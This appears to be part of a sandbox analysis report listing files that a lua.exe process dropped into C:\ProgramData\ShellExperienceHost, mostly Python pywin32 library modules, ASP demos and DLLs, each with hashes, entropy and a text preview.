Entropy (8bit):	4.873767304801146
Encrypted:	false
SSDEEP:	24:ktih/kTQbLreOZccNy1QEQ2ALkyOZvnvIeJCmvsFTMGQHXYzS4SyuhvQnmLM:ktFTQbHe2NIc2qk3ZNvqav4yhvK8M
MD5:	3875C20E5715A441493274E4D820F695
SHA1:	84925760DAFAAAA230D312A2070C24714C33C460
SHA-256:	707F0747584939A1EDDAF32FD1C2B5C60EC3FFE0373A0248F9644C4D8A3B5728
SHA-512:	334DCA5F6E995423B0D00FB0C5CA3E448B90911BFBFAE7AD61E7F50DBDE5A2D42588CE9EB70B7108688341D10AEBD9769CDD1A4A75FB1C548AEC952D0BDB18FB
Malicious:	false
Preview:	import sys, string.import traceback.from win32com.axdebug import axdebug.from win32com.client.util import Enumerator.import pythoncom..def DumpDebugApplicationNode(node, level = 0):. # Recursive dump of a DebugApplicationNode. spacer = " " * level. for desc, attr in [("Node Name", axdebug.DOCUMENTNAMETYPE_APPNODE),. ("Title", axdebug.DOCUMENTNAMETYPE_TITLE),. ("Filename", axdebug.DOCUMENTNAMETYPE_FILE_TAIL),. ("URL", axdebug.DOCUMENTNAMETYPE_URL),. ]:. try:. info = node.GetName(attr). except pythoncom.com_error:. info = "<N/A>". print("%s%s: %s" % (spacer, desc, info)). try:. doc = node.GetDocument(). except pythoncom.com_error:. doc = None. if doc:. doctext = doc.QueryInterface(axdebug.IID_IDebugDocumentText). numLines, numChars = doctext.GetSize().# text, attr = doctext.GetText(0, 20, 1).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axdebug\expressions.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6199
Entropy (8bit):	4.809238730955895
Encrypted:	false
SSDEEP:	192:DJt1b4pWgYiNeybSIuR6BJukLtw7JbJRT6GJbJmoX0Db4+QyZt9N:DJ8pWaeImIfGJbJcbf
MD5:	D5468E519177D907AADA4FC00E33FC6D
SHA1:	9CF411813DBEA7A9D419142C8C1DEA57550ED0BF
SHA-256:	A4D99FB27C05DAC96FDA4CC1E82A38AD5DECAB211F8464B4D93E03A2025594DA
SHA-512:	630BB796623143626926188C004FBD6550F4190F5040BABC27B85FE39ED99F8D864D25E148B30A0C85DD57650CCB5CFF9D7EB7145AB59DCD3EAE78ED26DF0F5A
Malicious:	false
Preview:	import axdebug, gateways.from .util import _wrap, _wrap_remove, RaiseNotImpl.import io, traceback.from pprint import pprint.from win32com.server.exception import COMException.import winerror.import string.import sys..# Given an object, return a nice string.def MakeNiceString(ob):. stream = io.StringIO(). pprint(ob, stream). return string.strip(stream.getvalue())..class ProvideExpressionContexts(gateways.ProvideExpressionContexts):. pass..class ExpressionContext(gateways.DebugExpressionContext):. def __init__(self, frame):. self.frame = frame. def ParseLanguageText(self, code, radix, delim, flags):. return _wrap(Expression(self.frame, code, radix, delim, flags), axdebug.IID_IDebugExpression). def GetLanguageInfo(self):.# print "GetLanguageInfo". return "Python", "{DF630910-1C1D-11d0-AE36-8C0F5E000000}"..class Expression(gateways.DebugExpression):. def __init__(self, frame, code, radix, delim, flags):. self.callback = None

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axdebug\gateways.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	17122
Entropy (8bit):	4.7658550068852215
Encrypted:	false
SSDEEP:	384:slyuKDn57M5wWN0DCyWLF8wygIz2khymA9Yj0e7BXKZH73lnW/EvUs9p/:SGCljn
MD5:	99F1F97AA30F08E312530C3C7E359CC6
SHA1:	92CAA5EF869DABEE9C3F5EC81C88E78CD6B76C77
SHA-256:	56A0BAB1569EA5EE3EEAC1D377FB4DA98793F70F3B1305D7244B5566A2408185
SHA-512:	0D032880C4EB5B0924BB3F4C97592BB26A1A6C8AB871BF1CA9A963971D60EA8E77BA45CCA1AB2C1B1BB3AC1403E9E2195F68363294AA21AAB8A5DA3CA32A9BD5
Malicious:	false
Preview:	# Classes which describe interfaces...from win32com.server.exception import Exception.from win32com.server.util import ListEnumeratorGateway.from win32com.axdebug import axdebug.from win32com.axdebug.util import RaiseNotImpl, _wrap.import pythoncom.import win32com.server.connect.import winerror..class EnumDebugCodeContexts(ListEnumeratorGateway):. """A class to expose a Python sequence as an EnumDebugCodeContexts.. Create an instance of this class passing a sequence (list, tuple, or. any sequence protocol supporting object) and it will automatically. support the EnumDebugCodeContexts interface for the object... """. _com_interfaces_ = [ axdebug.IID_IEnumDebugCodeContexts ]..class EnumDebugStackFrames(ListEnumeratorGateway):. """A class to expose a Python sequence as an EnumDebugStackFrames.. Create an instance of this class passing a sequence (list, tuple, or. any sequence protocol supporting object) and it will automatically. support the EnumDebugStackFra

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axdebug\stackframe.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5818
Entropy (8bit):	4.6166988202712735
Encrypted:	false
SSDEEP:	96:FeJqcyDVfixfssI1ktIM5ToAY9kPwmTiq7KVpoctfgNHYcDHvJmcKBbrnfj:FeJJ6ks7kMnk5mIchgJY2HvJm/brnfj
MD5:	394E7624B1FFCA514A2DC6F546413CEE
SHA1:	F0BBF40F7DFFFD10DB866A3BE97706E044ACD3AA
SHA-256:	29AECD6D8CCA11DBE2652FF87BD48C4A8D3252BBD5AA2A8A146D57CA4AE0A3F6
SHA-512:	ADADA257ECCA0FDEA0DD18A9D8735619C6B8BA9973E74E9DB82D6D074CA9CFF54EF1BB5D0EC2E574628980F2E8AEBC18BECF32799681710FB9A45EAA70BA3927
Malicious:	false
Preview:	"""Support for stack-frames...Provides Implements a nearly complete wrapper for a stack frame..""".import sys.from .util import _wrap, RaiseNotImpl.import expressions, gateways, axdebug, winerror.import pythoncom.from win32com.server.exception import COMException..from .util import trace.#def trace(*args):.# pass..class EnumDebugStackFrames(gateways.EnumDebugStackFrames):. """A class that given a debugger object, can return an enumerator. of DebugStackFrame objects.. """. def __init__(self, debugger):. infos = []. frame = debugger.currentframe.# print "Stack check". while frame:.# print " Checking frame", frame.f_code.co_filename, frame.f_lineno-1, frame.f_trace,. # Get a DebugCodeContext for the stack frame. If we fail, then it. # is not debuggable, and therefore not worth displaying.. cc = debugger.codeContainerProvider.FromFileName(frame.f_code.co_filename). if cc

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axdebug\util.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3672
Entropy (8bit):	4.744186399796138
Encrypted:	false
SSDEEP:	96:HCZa12QPj1eHPwM38DSVPT0FZ0W2RY28kU:HCnHPwY8FoJRY2w
MD5:	3306C91923BDABEBCBDA0367CFFD3F6C
SHA1:	2972341C18AD459F264FFF05C8B753BF0586B452
SHA-256:	3C264550090B01F26BB7143F2A21AF12773DBAB3FC2D5A7AC6157143CD9DB5DD
SHA-512:	02BA7A11ED98BDDFA7B0910AED302741335619E1C9E49204EB38B4D906FB2CAAA49EC1D3ACEAAC53DC34B303F662B06DBD0166FA44A736CE0E16E0EA8ACE15DE
Malicious:	false
Preview:	# Utility function for wrapping objects. Centralising allows me to turn.# debugging on and off for the entire package in a single spot...import sys.import win32com.server.util.from win32com.server.exception import Exception.import winerror.import win32api.import os..try:. os.environ["DEBUG_AXDEBUG"]. debugging = 1.except KeyError:. debugging = 0..def trace(*args):. if not debugging: return. print(str(win32api.GetCurrentThreadId()) + ":", end=' '). for arg in args:. print(arg, end=' '). print()..# The AXDebugging implementation assumes that the returned COM pointers are in.# some cases identical. Eg, from a C++ perspective:.# p->GetSomeInterface( &p1 );.# p->GetSomeInterface( &p2 );.# p1==p2.# By default, this is _not_ true for Python..# (Now this is only true for Document objects, and Python.# now does ensure this...all_wrapped = {}..def _wrap_nodebug(object, iid):. return win32com.server.util.wrap(object, iid)..def _wrap_debug(object, iid):. import

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axscript\Demos\client\asp\CreateObject.asp Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	494
Entropy (8bit):	4.950467557412256
Encrypted:	false
SSDEEP:	6:FUHFOaiAvxO62SE3ua0adaLVsT8Oc/Y7GAslF6PRT6QGtZCH7LWczhMSLurpNNF2:ylaUx7EtX89ACAy4hg+2cDeJFw3Ph3
MD5:	F2A1816F8A766DA6CA8710F78CD87A01
SHA1:	C64D0487D9938B9C27AFD0A27A32582C904FBBA7
SHA-256:	01BFD732042A9C625240F5497C2EADF37FC39C26F17FE8BDA1510E81A2FF8113
SHA-512:	EC0161C0EAF31885B6A4CE81D20285777B37A45B532F42B8F49FDFF6A1D0D905CE59410E22395BB322745239599C6ECE29623C3FAA7EF3163C69F18D24F12155
Malicious:	false
Preview:	<HTML>..<SCRIPT Language="Python" RUNAT=Server>..# Just for the sake of the demo, our Python script engine.# will create a Python.Interpreter COM object, and call that...# This is completely useless, as the Python Script Engine is.# completely normal Python, and ASP does not impose retrictions, so.# there is nothing the COM object can do that we can not do natively...o = Server.CreateObject("Python.Interpreter")..Response.Write("Python says 1+1=" + str(o.Eval("1+1")))..</SCRIPT>..</HTML>..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axscript\Demos\client\asp\caps.asp Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1315
Entropy (8bit):	5.376773374308319
Encrypted:	false
SSDEEP:	24:peB8PCGd0fnMYVdK1fXwAqfyBxbdLGLNWLheZI9zc:peBW6t2IABDMN8EZIlc
MD5:	E74AF176267B3EFCD55D9F2C0A7C79A0
SHA1:	3FCFD4109B54E5278A83924535E5A794C3ADAC02
SHA-256:	B0638B401EBACC0288601B8DCD9DFC05492B8130047153E2B3DAAA89A9D584EC
SHA-512:	611767B3242D4B1AAC1B0CBF2DDF230B84FF265A68DA97032ADD88185CFE485417EB35916412416D477F7447DEBDAE1B00B198A226C55669F40A3568CC1DB714
Malicious:	false
Preview:	<%@ Language=Python %>.<HTML>..<HEAD>..<BODY BACKGROUND="/samples/images/backgrnd.gif">..<TITLE>Python test</TITLE>..</HEAD>..<BODY BGCOLOR="FFFFFF">..<SCRIPT Language="Python" RUNAT=Server>.# NOTE that the <% tags below execute _before_ these tags!.Response.Write("Hello from Python<P>").Response.Write("Browser is "+bc.browser).import win32api # Should be no problem using win32api in ASP pages..Response.Write("<p>Win32 username is "+win32api.GetUserName()).</SCRIPT>..<BODY BGCOLOR="FFFFFF">..<% .import sys.print sys.path.from win32com.axscript.asputil import *.print "Hello".print "There".print "How are you".%>..<%bc = Server.CreateObject("MSWC.BrowserType")%>.<BODY BGCOLOR="FFFFFF">.<table border=1> .<tr><td>Browser</td><td> <%=bc.browser %> .<tr><td>Version</td><td> <%=bc.version %> </td></TR> .<tr><td>Frames</td><td> .<%Response.Write( iif(bc.frames, "TRUE", "FALSE")) %></td></TR> .<tr><td>Tables</td><td> .<%Response.Write( iif (bc.tables, "TRUE", "FALSE")) %></td></TR> .<tr><td>Back

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axscript\Demos\client\asp\interrupt\test.asp Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	73
Entropy (8bit):	4.6634420662057625
Encrypted:	false
SSDEEP:	3:mEL/92RNKvL+wWVKj5XAGdATLNZAbbL:mEQRNKvL9WVKSQsWL
MD5:	026BD95291EF0A682B4CFE39AF58260E
SHA1:	16D41B16A3271F3C47C5B48DF9C23C42F1554468
SHA-256:	8C9847520D55AD42055BBF62213AB1C2AFE0DFA403E0F0AF98C351DD85AA8C2E
SHA-512:	4C927C06C3F48EC93D034BC3D09F38ED34127DC45665AE419ED75A30F0C418526B91702C7AFBB95C4380F7575926350F5454267D043B85270AD74DA2E4E9007B
Malicious:	false
Preview:	<%@ language=python%>.<html>.<%Response.Redirect("test1.html")%>.</html>.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axscript\Demos\client\asp\interrupt\test.html Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	156
Entropy (8bit):	4.90258935885804
Encrypted:	false
SSDEEP:	3:qVvzL5LJxLNA6zEO9hYLgMkADFqCkXAhTtKMLmUytE0BUYL0Hac4Nhtv0GL:qFzL5PNG+mkCkwhBXL/yLB/4HX43d0GL
MD5:	4697F4D1A8711448BB1D5BD6CF1231C2
SHA1:	A20D91CC916C86FDBB44EE7668B349A3D83AD4DB
SHA-256:	25F04589490D305CA3239E0B966C96223BA90D4B4FE28C90A99CA36499401F07
SHA-512:	D54624A111A4CA78FEDD61803DE9D431138DE9BC9C638721B9152060A73327CFF7EDF45E111BE519A941E2D3AA0A45C55B2E4CFB73031B664942792B2FDF8442
Malicious:	false
Preview:	<html>.<head>.<body>.GOT There.<script language=javascript>.location.href ="http://192.168.0.1/Python/interrupt/test.asp".</script>.</body>.</head>.</html>.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axscript\asputil.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	227
Entropy (8bit):	4.563014224283686
Encrypted:	false
SSDEEP:	6:sARc6XFJyOhpDjc/JMRc1GfwpRXq1JIIwx:n9yoEBQeG4pRkJIIc
MD5:	FE41817881286B324A885C4C274FAB4A
SHA1:	763FCDF06971DD17C65E556C312A12924B48AF77
SHA-256:	BDD7F4CAFA4026F3A31200CC057C5D2133B7D22779EFE8AE8B8A4166B92AED51
SHA-512:	3CC4FBCC562133EAE82CFF1DFF36FD5494DFD6371357DC7D87AF83222B7AA0F16F7F04DC23E56369E9057FFFC0DC51E372DDCA085C9230AC73F380A5E27DBD64
Malicious:	false
Preview:	"""A utility module for ASP (Active Server Pages on MS Internet Info Server...Contains:..iif -- A utility function to avoid using "if" statements in ASP <% tags.."""..def iif(cond, t, f):..if cond:...return t..else:...return f.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axscript\axscript.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	93696
Entropy (8bit):	5.893623647382585
Encrypted:	false
SSDEEP:	1536:7ep5Gu5DZJZ2fGIqM0E9YOTMWRjRvaMAmJOsffQH3:25Fj2uIqNkrMWRjRvaMAmJRXg3
MD5:	C25E22570F8BCA3748EAF3EC4CB960BB
SHA1:	0102D5E905628806B47B5E80C3631F505B5EF863
SHA-256:	73466C9188E39DD1AB26DEAB0F7C05452B35A48C3361EBA2EF15F275379A77EE
SHA-512:	BC558FFEFC9E95A3256BEEEAAF81D2551CB78B1E4FB1F83A8525C533DF67CBD7E39E11D40C273E8C1150D3A4DA661297992EF5B87B243C10991E372EB6917D0D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.%r..K!..K!..K!...!..K! .J ..K!..J ..K! .H ..K! .N ..K! .O ..K!h.M ..K!..J ..K!h.J ..K!..J!..K!..N ..K!..K ..K!..I ..K!Rich..K!........PE..d...S]._.........." .........................M...........................................`..................................................9..........T.......\.......................T............................................................................text...~........................... ..`.rdata.............................@..@.data...8....`.......F..............@....pdata..\............R..............@..@.gfids..4............d..............@..@.rsrc...T............f..............@..@.reloc...............j..............@..B................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axscript\client\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	27
Entropy (8bit):	3.926571651178274
Encrypted:	false
SSDEEP:	3:SbFVEPxVW2:SbFupVH
MD5:	6BA7C50D6D1AB57D23565ED35813EAD7
SHA1:	B32E72D4EA5B883E21CD3FD7CC1FB7DB58B57281
SHA-256:	38686F1600EF06C7CFEA5BFB7DB2C952D8FB9A02664B2B587528C04A2C037C1B
SHA-512:	05CFD07756DBB06B2B89A62395E372F6652D6BEEB205E1226E0463852B0B71624D08524600008502F21E6087C0222A3EA8059D0578E2662D24FC00AA7821A9E1
Malicious:	false
Preview:	# This is a Python package.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axscript\client\debug.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7334
Entropy (8bit):	5.111652937354497
Encrypted:	false
SSDEEP:	192:zDe1yB+5WuqUWNB4y4Bj05KPM1BOD7vpVAxfcQXG:zi1ylueC0FwvonG
MD5:	D38A2FD8F13EAED1EEA1170ACA64142C
SHA1:	1C5C36010AEEABC9DF7CE7DF83B673C41C165008
SHA-256:	34F9FC34ACA2158E555D0D27739C48EE020F9D22BB20FAD7A30734E55C3607AC
SHA-512:	02C02147BA65112180A48FA7D3DAB1928E6EA3A73CF6969FAE3999AEBDA16D081A2C72608D50BDD4675991EF45A2878DFDFD5EEBC9A11141BF374FE62872076E
Malicious:	false
Preview:	import traceback, sys, string..import win32com.server.util.from win32com.util import IIDToInterfaceName.from win32com.client.util import Enumerator.from win32com.server.exception import COMException.import pythoncom.from .framework import trace.from win32com.axdebug import axdebug, gateways, contexts, stackframe, documents, adb.from win32com.axdebug.codecontainer import SourceCodeContainer.from win32com.axdebug.util import _wrap, _wrap_remove.import win32com.client.connect.import win32api, winerror.import os..try:..os.environ["DEBUG_AXDEBUG"]..debuggingTrace = 1..# Should we print "trace" output?.except KeyError:..debuggingTrace = 0..def trace(*args):.."""A function used instead of "print" for debugging output..."""..if not debuggingTrace:...return ..print(win32api.GetCurrentThreadId(), end=' ')..for arg in args:...print(arg, end=' ')..print()..# Note that the DebugManager is not a COM gateway class for the .# debugger - but it does create and manage them..class DebugManager:.._debugge

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axscript\client\error.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7981
Entropy (8bit):	5.030865578758339
Encrypted:	false
SSDEEP:	192:hMvZUS0E01eaFn470CSv/6NToaJUzWmkmTXWazA4KaL:hMvZUHeUu0C8CVJUgmTm01pL
MD5:	C5D671A41CB0C32BF8042429D00DDC79
SHA1:	C1E496AABAD828E572E6934A22E09C4D08BDD234
SHA-256:	EBECDC8F2E02FF42EFB75CC98DBD00C974A02B54913D43B264707F29ABEE53DC
SHA-512:	3D092EDD9CE79F38ADABE2246060C5C2236F1C89D30614E3EDE5F8F3EC10BC52FFDCA86021C1B456D1829B48703735B33B8DC6AF7F9F43DF4698115E0F043640
Malicious:	false
Preview:	"""Exception and error handling... This contains the core exceptions that the implementations should raise. as well as the IActiveScriptError interface code.. ."""..import sys, traceback.from win32com.axscript import axscript.import winerror.import win32com.server.exception.import win32com.server.util.import pythoncom.import re..debugging = 0..def FormatForAX(text):.."""Format a string suitable for an AX Host.."""..# Replace all " with ', so it works OK in HTML (ie, ASP)..return ExpandTabs(AddCR(text))..def ExpandTabs(text):..return re.sub('\t',' ', text)..def AddCR(text):..return re.sub('\n','\r\n',text)..class IActiveScriptError:.."""An implementation of IActiveScriptError....The ActiveX Scripting host calls this client whenever we report..an exception to it. This interface provides the exception details..for the host to report to the user...""".._com_interfaces_ = [axscript.IID_IActiveScriptError].._public_methods_ = ["GetSourceLineText","GetSourcePosition","GetExceptionInfo"]..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axscript\client\framework.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	36789
Entropy (8bit):	5.209552609007389
Encrypted:	false
SSDEEP:	768:YUSlLbfHYO9minnYuIBbIroxfXKKrqwu4XjP7V:JSpf99EDBbIroxfXKKrqwuMjPh
MD5:	6E799D442784C89999184E5F9F8265E4
SHA1:	0DDE6CA7E286AC4335852F75E050C9AE4CD68A01
SHA-256:	8A314D2675AE0E99D3D376CB2C78091F8AC389CEF986F9CF3F655763C93CA346
SHA-512:	8E713F1671DBC25FD6E85EE3F9D7BE1C086E0F4B4D3AF1BFD2B30A10500B5D1D76702BADF802CD7CCCA4BAA6029C1DD849173B2AE6EFCC47B9FA22C3BD1FD940
Malicious:	false
Preview:	"""AXScript Client Framework.. This module provides a core framework for an ActiveX Scripting client.. Derived classes actually implement the AX Client itself, including the. scoping rules, etc... There are classes defined for the engine itself, and for ScriptItems.""".import sys.from win32com.axscript import axscript.import win32com.server.util..import win32com.client.connect # Need simple connection point support..import win32api, winerror.import pythoncom.import types.import re..def RemoveCR(text):.# No longer just "RemoveCR" - should be renamed to.# FixNewlines, or something. Idea is to fix arbitary newlines into.# something Python can compile.....return re.sub('(\r\n)\|\r\|(\n\r)','\n',text)..SCRIPTTEXT_FORCEEXECUTION = -2147483648 # 0x80000000.SCRIPTTEXT_ISEXPRESSION = 0x00000020.SCRIPTTEXT_ISPERSISTENT = 0x00000040..from win32com.server.exception import Exception, IsCOMServerException.from . import error # ax.client.error..state_map = {..axscript.SCRIPTSTATE_UNINITIALIZED:

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axscript\client\pydumper.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2134
Entropy (8bit):	5.084900094273364
Encrypted:	false
SSDEEP:	48:nejpDpuXBeNXmmZSnLaz0hr1Fhi6AJg9vW/GdGvGkbBbk:qOIBFInPr1FhiUVSGYBbk
MD5:	4B814F542075C219E9451D71111A2EDC
SHA1:	8C35C10EC0546C14BCC495FA14F4DE0C5B90C40C
SHA-256:	39DDBA6F7E4CA0BF41CE564626BDE5280773EDF9463F58A70EB31A6DB67C7158
SHA-512:	29A2A6CFBE5E9D6E66E2DCC0A594D72B9CC7C5AB4427DCAC3EC63E75512E221C1A2E6712D6E9E92193774F64F11173292255C95C875E24E6AF4990EAF67E7B1D
Malicious:	false
Preview:	# pydumper.py.#.# This is being worked on - it does not yet work at all, in ay way.# shape or form :-).#.# A new script engine, derived from the standard scripting engine,.# which dumps information...# This generally can be used to grab all sorts of useful details about.# an engine - expose bugs in it or Python, dump the object model, etc...# As it is derived from the standard engine, it fully supports Python.# as a scripting language - meaning the dumps produced can be quite dynamic,.# and based on the script code you execute...from . import pyscript.from win32com.axscript import axscript..from .pyscript import RaiseAssert, trace, Exception, SCRIPTTEXT_FORCEEXECUTION..PyDump_CLSID = '{ac527e60-c693-11d0-9c25-00aa00125a98}'..class AXScriptAttribute(pyscript.AXScriptAttribute):..pass..class NamedScriptAttribute(pyscript.NamedScriptAttribute):..pass...class PyScript(pyscript.PyScript):..pass...def Register():..import sys..if '-d' in sys.argv:...dispatcher = "DispatcherWin32trace"...debug

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axscript\client\pyscript.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12746
Entropy (8bit):	5.166106493082195
Encrypted:	false
SSDEEP:	384:sXkqzFZt446jjhjzjuolYjDjTjWjSjktjOH3nrrHFXVM2PYij8jUjAjXTjf1jQjF:wkqJZt44q9PuolU/viekpkLYAMXvfh8F
MD5:	BFC9B68AB31FC42D7E55FF87465084DA
SHA1:	21D849FC4BD3AF4E33EAC38CFA354D1113D8F31F
SHA-256:	4EB375DAAA8058F64060DBE14D78148D609253E1A0B282ACAB127E0678F9D1A0
SHA-512:	E8511504F2ECF3FD7487540657051EE7782F2C233D9FF4371ACC9F29E4F1557A71DC11F03B50D3591BE556668325ECA8E00AFE2276028DF5173E8C54CE89D2AD
Malicious:	false
Preview:	"""Python ActiveX Scripting Implementation..This module implements the Python ActiveX Scripting client...To register the implementation, simply "run" this Python program - ie.either double-click on it, or run "python.exe pyscript.py" from the.command line.."""..import winerror.import win32com.import win32api.import pythoncom.import sys.import traceback.import re.import win32com.client.dynamic.from win32com.axscript.client import framework, scriptdispatch.from win32com.axscript import axscript.import win32com.server.register..from win32com.axscript.client.framework import \..RaiseAssert, trace, Exception, SCRIPTTEXT_FORCEEXECUTION, \..SCRIPTTEXT_ISEXPRESSION, SCRIPTTEXT_ISPERSISTENT..PyScript_CLSID = "{DF630910-1C1D-11d0-AE36-8C0F5E000000}"..debugging_attr = 0..def debug_attr_print(args):..if debugging_attr:...trace(args)..def ExpandTabs(text):..return re.sub('\t',' ', text)..def AddCR(text):..return re.sub('\n','\r\n',text)..class AXScriptCodeBlock(framework.AXScriptCodeBlock):..d

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axscript\client\pyscript_rexec.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1986
Entropy (8bit):	5.31010539088267
Encrypted:	false
SSDEEP:	48:SSzKXMtCfKvt04V1Bd262JCDchiN8MMULGnVRX4ufL:DK8tLtVHBdBQ95SGVRXjfL
MD5:	349C2D0245537A34C12E657AAACA3F86
SHA1:	73AC9B052DF41184C5D37DF4CBBA37D4A93818FC
SHA-256:	1241F5445596AA9175454B4E7A9FF9D96879CCAD59CBE5E206D8DC78E76F707F
SHA-512:	6994A0BFE75A7885F75E444D197D05208A6007C7D7B036501EDDF9FA5BB881CB4838620F3E9B17E395F4B6F7A9E5D33B0FA8D9DD4040647C5DA9D7DEB680888D
Malicious:	false
Preview:	# A version of the ActiveScripting engine that enables rexec support.# This version supports hosting by IE - however, due to Python's.# rexec module being neither completely trusted nor private, it is.# not enabled by default..# As of Python 2.2, rexec is simply not available - thus, if you use this,.# a HTML page can do almost anything at all on your machine...# You almost certainly do NOT want to use thus!..import pythoncom.from win32com.axscript import axscript.import winerror.from . import pyscript..INTERFACE_USES_DISPEX = 0x00000004.# Object knows to use IDispatchEx.INTERFACE_USES_SECURITY_MANAGER = 0x00000008 # Object knows to use IInternetHostSecurityManager..class PyScriptRExec(pyscript.PyScript):..# Setup the auto-registration stuff....._reg_verprogid_ = "Python.AXScript-rexec.2".._reg_progid_ = "Python" # Same ProgID as the standard engine..#._reg_policy_spec_ = default.._reg_catids_ = [axscript.CATID_ActiveScript,axscript.CATID_ActiveScriptParse].._reg_desc_ = "Python Ac

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axscript\client\scriptdispatch.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3304
Entropy (8bit):	5.164676461892356
Encrypted:	false
SSDEEP:	48:chKjmrTZaFD1A37ah5Wx2NUCj4RV4StA/GSE93Ac2moDkxs56VB4Kl0irlRuyE+:fyr9aR1A3y5ppSVyW3A2Ka4I0mRuyE+
MD5:	E70128D5F9989C32D4ACC06E04C6137D
SHA1:	339E3F024F14E860EC65E6D7E83E87CCEEBCA390
SHA-256:	094629CC07E837FC0CCFDB58605C655658B20F89638C3B30CA55A16FB28E5492
SHA-512:	64534B1B54E11960FD891E925DDBC4A65F5F71D391A9F41415E910ACA9E7E68BD697CF4042E82A473AA3A6D9CE09D2A459CA4483A7027FC32C53743B094B57AD
Malicious:	false
Preview:	"""dynamic dispatch objects for AX Script... This is an IDispatch object that a scripting host may use to. query and invoke methods on the main script. Not may hosts use. this yet, so it is not well tested!."""..import winerror.import types.from win32com.server.exception import COMException.import win32com.server.policy.import win32com.server.util.from win32com.client import Dispatch.import pythoncom.from win32com.axscript import axscript..debugging = 0..PyIDispatchType = pythoncom.TypeIIDs[pythoncom.IID_IDispatch]..def _is_callable(obj):..return type(obj) in [types.FunctionType, types.MethodType]..# ignore hasattr(obj, "__call__") as this means all COM objects!..class ScriptDispatch:.._public_methods_ = []..def __init__(self, engine, scriptNamespace):...self.engine = engine...self.scriptNamespace = scriptNamespace...def _dynamic_(self, name, lcid, wFlags, args):...# Ensure any newly added items are available....self.engine.RegisterNewNamedItems()...self.engine.ProcessNewNamedItemsCon

C:\ProgramData\ShellExperienceHost\api-ms-win-core-file-l1-2-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11576
Entropy (8bit):	6.619637172709859
Encrypted:	false
SSDEEP:	192:KW+WphWoiD1S8f4DBQABJty10cQRW52fqnaj7zdxTkRo:KPWphWoiD1IDBRJtuifl/zdx+o
MD5:	C7B0DCD9935DA9BDC9B390B4B0A9ABAC
SHA1:	A38EDA8861819B9D6DF0FC69A3664BD05634D884
SHA-256:	E04EC04A6C3D0DD77918BD671AC0B14A00865CEC66BA995A1E369ECED65CA89A
SHA-512:	3F0A02F441911BFDD81BD892149F14B29E6276DCE75B39FBEEDAE96ED4D20DDE947DD95E5C8A4562EECA7864D8C58B57307690687600A5EA707F17D6665D3D22
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d...b..-.........." .........................................................0......#.....`.........................................`...L............ ..................8!..............T............................................................................rdata..l...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\api-ms-win-core-localization-l1-2-0.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	14136
Entropy (8bit):	6.6637990089463575
Encrypted:	false
SSDEEP:	384:JOMw3zdp3bwjGfue9/0jCRrndbpWphW1D1IDBRJtL6+VOXzIwS+klTxd:JOMwBprwjGfue9/0jCRrndbUYI1PE+4S
MD5:	464DF4108FD3C92B67953ADFD272D093
SHA1:	324080F43258BA7C9A70F88F9067FAD4F77CD8D5
SHA-256:	BF05002E9A83B94196AE0F1B1F53E8BA1356801B02BB7181B27EDB5437988DED
